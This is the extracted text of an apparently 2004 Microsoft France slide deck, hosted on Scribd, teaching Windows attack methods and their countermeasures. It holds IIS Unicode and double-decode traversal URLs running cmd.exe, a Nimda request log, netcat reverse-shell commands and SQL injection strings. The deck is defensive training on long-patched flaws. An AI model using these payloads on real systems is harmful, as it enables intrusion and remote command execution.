Scribd Logo
Importer

Bienvenue sur Scribd !

  • Hacking Windows Methodes Dattaque Et Contre-Mesures

    Transféré par

    Youssou Gueye
    174 vues6 pages

    Titre original

    Hacking Windows Methodes Dattaque Et Contre-mesures

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Formats disponibles

    PPT, PDF, TXT ou lisez en ligne sur Scribd

    Avez-vous trouvé ce document utile ?

    Ce contenu est-il inapproprié ?

    Signaler ce document

    Droits d'auteur :

    Attribution Non-Commercial (BY-NC)
    Téléchargez comme PPT, PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    174 vues6 pages

    Hacking Windows Methodes Dattaque Et Contre-Mesures

    Transféré par

    Youssou Gueye

    Droits d'auteur :

    Attribution Non-Commercial (BY-NC)
    Téléchargez comme PPT, PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    sur 6

    8/23/2011 8:57 PM

    Avertissement Mthodes dattaque et contrecontre-mesures


    Cyril Voisin Chef de programme scurit Pascal Sauliere Consultant principal scurit Microsoft France Le but de cette prsentation est pdagogique:
    Illustrer certaines faiblesses, certaines erreurs courantes en sappuyant sur des attaques connues Et surtout en dduire les moyens de mieux vous protger, pour viter ces types dattaques

    Important : les attaques faisant intervenir des vulnrabilits ont t choisies pour illustrer les propos, et font volontairement appel des vulnrabilits connues depuis plusieurs mois ou annes et dont les corrections sont disponibles et largement diffuses

    Rappel : la loi sanctionne


    Loi du 5 janvier 1986 relative a la fraude informatique, dite Loi Godefrain Articles 323-1 et suivants du Code pnal 323323323-1 : Le fait d'accder ou de se maintenir, frauduleusement, dans tout ou partie d'un systme de traitement automatis de donnes est puni d'un an d'emprisonnement et de 15000 euros d'amende. Lorsqu'il en est rsult soit la suppression ou la modification de donnes contenues dans le systme, soit une altration du fonctionnement de ce systme, la peine est de deux ans d'emprisonnement et de 30000 euros d'amende. 323323-2 : Le fait d'entraver ou de fausser le fonctionnement d'un systme de traitement automatis de donnes est puni de trois ans d'emprisonnement et de 45000 euros d'amende. 323323-3 : Le fait d'introduire frauduleusement des donnes dans un systme de traitement automatis ou de supprimer ou de modifier frauduleusement les donnes qu'il contient est puni de trois ans d'emprisonnement et de 45000 euros d'amende.

    Dmarche thorique
    Renseignement Scanning numration Pntration lvation de privilge Accs interactif Nettoyage

    dans la pratique :
    numrer tout ce que lon peut (adresses, ports, services, OS, versions, utilisateurs) Tester toutes les vulnrabilits connues Contourner les protections, trouver la petite porte Casser les mots de passe Installer son rootkit Cacher ses traces

    Scnario
    JeanJean-Kevin fait un stage au service courrier chez PLA S.A. (Pieds de Lunettes Astronomiques) Il est mal pay Il a du temps Il apporte son PC portable et le branche sur le rseau.

    2003 CSI/FBI Computer Crime and Security Survey :


    Les formes dattaques cites le plus souvent sont les virus (82%) et les abus par des utilisateurs internes (80%)

    2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

    8/23/2011 8:57 PM

    Rseau dcouvrir

    Ping Sweep
    Objectif : numrer les machines qui rpondent au Ping (ICMP Echo Request) Outils :
    Ping (Windows) Nmap -sP (Fyodor, insecure.org) sl -n (ScanLine, ex-fscan de Foundstone) ex

    Adresses et noms
    MARS VENUS HALLEY

    Port Scanning
    Objectif : numrer les services prsents sur une machine (Ports TCP et UDP ouverts ) Outils :
    Nmap (insecure.org) sl (Foundstone) SuperScan (Foundstone)

    192.168.11.2

    192.168.11.3

    192.168.11.4

    192.168.11.10

    Services
    MARS DC VENUS SMTP HTTP HTTPS HALLEY DC SQL

    Dtermination des versions


    Versions des OS Versions des services C:\>nc www.msn.com 80 Exemple : HEAD / HTTP/1.0
    HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 08 Apr 2004 20:55:19 GMT Content-Type: text/html Content-Length: 172

    192.168.11.2

    192.168.11.3

    192.168.11.4

    192.168.11.10

    Outils :
    nc (NetCat : @Stake) Nmap -sV -O

    2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

    8/23/2011 8:57 PM

    Version des OS
    MARS DC VENUS IIS HALLEY DC SQL W2000 192.168.11.4

    numration NetBIOS
    Objectifs : machines, domaines, contrleurs de domaine Outils : Name Service Type
    Nbtstat Nbtscan
    ---------------------------------------CORP-DC <00> UNIQUE CORP-DC <20> UNIQUE CORP <00> GROUP CORP <1c> GROUP CORP <1b> UNIQUE CORP-DC <03> UNIQUE CORP <1e> GROUP INet~Services <1c> GROUP IS~CORP-DC <00> UNIQUE CORP <1d> UNIQUE ??__MSBROWSE__? <01> GROUP ADMIN <03> UNIQUE

    W2000 192.168.11.2

    W2000 192.168.11.3

    Contr l r omaine

    192.168.11.10

    Utilisateur

    2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

    8/23/2011 8:57 PM

    Approbation

    DomA

    Accs aux ressources

    DomB

    2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

    8/23/2011 8:57 PM

    File System traversal


    Par dfaut (NT4, W2K) :
    /scripts est excutable Correspond C:\Inetpub\Scripts C:\Inetpub\ Windows dans C:\WINNT C:\ Commandes systmes dans : scripts/../../winnt/system32 La squence ../ est interdite

    File System Traversal


    UNICODE
    RFC 2279 (codage UTF-8) dcodage aprs le UTFcontrle de ../ %c0%af / %c1%9c \ Corrig dans MS00-057 et W2K SP2 MS00-

    Double decode : dcodage UTF-8, contrle, puis UTF2me dcodage..


    %252f %252f %2f / %25%32%66 %25%32%66 %2f / %255c %255c %5c \ Corrig dans MS01-026 et W2K SP3 MS01-

    Des bugs (W2K pr-SP2 et prprprSP3) permettaient de contourner le contrle de ../

    File System Traversal


    Pr SP2 :
    http://server/scripts/..%c0%af../winnt/system32/ http://server/scripts/..%c0%af../winnt/system32/ cmd.exe?/c+dir

    Trace de Nimda, sept. 2001


    /scripts/..%255c../winnt/system32/cmd.exe /scripts/..%5c../winnt/system32/cmd.exe /scripts/root.exe /msadc/root.exe /c/winnt/system32/cmd.exe /d/winnt/system32/cmd.exe /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd .exe /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd .exe /scripts/winnt/system32/cmd.exe /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../. .%c1%1c../winnt/system32/cmd.exe /scripts/..%c1%1c../winnt/system32/cmd.exe /scripts/..%c0%af../winnt/system32/cmd.exe /scripts/..%252f../winnt/system32/cmd.exe /scripts/..%c1%9c../winnt/system32/cmd.exe

    Pr SP3 :
    http://server/scripts/..%255c..%255cwinnt/ http://server/scripts/..%255c..%255cwinnt/ system32/cmd.exe?/c+dir

    Exemples de commandes :
    cmd.exe /c dir cmd.exe /c echo xxx >> fichier.asp

    Mise en
    Serveur IIS

    uvre
    (3) Ecoute : nc l p 2222

    Contre mesures

    Attaquant

    Rpertoires web sur un volume spar IIS Lockdown (dsactivation composants inutiles, ACLs) + URLScan Application des correctifs de scurit (liste avec MBSA) Configurer le pare-feu et les stratgies pareIPsec pour ne laisser passer que les flux autoriss (source, destination, protocole, port) :
    IIS SQL TCP 1433 TCP 80, 443

    (4) Connexion : nc e cmd.exe xx.xx.xx.xx 2222

    2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

    8/23/2011 8:57 PM

    Attaque de SQL Server


    Trouver une vulnrabilit
    De SQL Server (ex : Slammer) Des applications utilisant SQL Server (cross site scripting, injection SQL)

    Injection SQL
    Non spcifique IIS, ni SQL Server Principe :
    Requte SQL construite avec une entre de lutilisateur Exemple :
    sqlCommand.CommandText = "Select title_id, "Select title, price From titles Where title like '%" + '%" TextBox1.Text + "%'"; "%'"; Select title_id, title, price From titles Where title like '%XXX%' '%XXX%' Select title_id, title, price From titles Where title like '%X' Or 1=1--%' '%X' 1=1--%' Select title_id, title, price From titles Where title like '%X' Union select 'A',name,0 from '%X' master..sysdatabases--%' master..sysdatabases--%'

    Trouver un mot de passe (SQLdict.exe)

    Contre mesures
    Scurit intgre Windows Mots de passe complexes Qualit du code (procdures stockes, requtes paramtres, validation des entres)

    Conclusions
    Erreur de manipulation de ladministrateur
    Compte de test non dsactiv

    Absence de patch
    IIS double decode, rvlation de code (Blaster, Sasser)

    Erreur de dveloppement
    Buffer overflow Injection SQL / utilisation de trop de privilges CrossCross-site scripting

    Config par dfaut pas assez scurise


    LMHash RestrictAnonymous

    Ressources disponibles
    Security Guidance Center http://www.microsoft.com/security/guidance/ Site Microsoft sur la scurit (tout public)
    http://www.microsoft.com/france/securite/

    Site MSDN sur la scurit (dveloppeurs)


    http://msdn.microsoft.com/security (en anglais)

    Site Technet sur la scurit (informaticiens)


    http://www.microsoft.com/france/technet/themes/secur /default.asp

    S'inscrire aux bulletins de scurit :


    http://www.microsoft.com/security/security_bulletins/al erts2.asp (en anglais)

    2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

    Vous aimerez peut-être aussi